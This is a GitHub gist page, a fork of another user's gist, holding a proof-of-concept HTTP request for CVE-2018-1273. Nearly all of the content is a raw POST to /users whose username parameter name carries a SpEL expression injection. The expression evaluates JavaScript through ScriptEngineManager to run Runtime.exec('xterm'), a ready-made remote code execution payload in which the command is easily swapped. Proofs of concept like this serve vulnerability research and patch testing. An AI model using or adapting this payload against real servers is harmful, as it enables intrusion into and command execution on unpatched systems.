Skip to content

Instantly share code, notes, and snippets.

@msakamoto-sf
Forked from matthiaskaiser/CVE-2018-1273.http
Created April 17, 2018 03:43
Show Gist options
  • Save msakamoto-sf/3e0f0236bd12e94d41b1daea5bcdb360 to your computer and use it in GitHub Desktop.
Save msakamoto-sf/3e0f0236bd12e94d41b1daea5bcdb360 to your computer and use it in GitHub Desktop.
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment